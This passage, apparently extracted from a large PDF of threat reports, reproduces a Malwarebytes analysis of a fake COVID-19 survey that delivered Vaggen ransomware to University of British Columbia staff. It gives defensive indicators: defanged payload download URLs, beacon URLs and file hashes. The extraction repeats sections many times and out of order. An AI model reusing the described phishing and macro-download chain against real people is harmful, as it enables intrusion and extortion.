3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1892 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1893 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1894 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1895 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1896 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1897 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1898 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1899 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1900 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1901 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1902 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1903 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1904 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1905 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1906 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1907 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1908 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1909 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1910 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1911 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1912 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1913 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1914 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1915 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1916 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1917 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1918 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1919 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1920 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1921 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1922 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1923 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1924 of 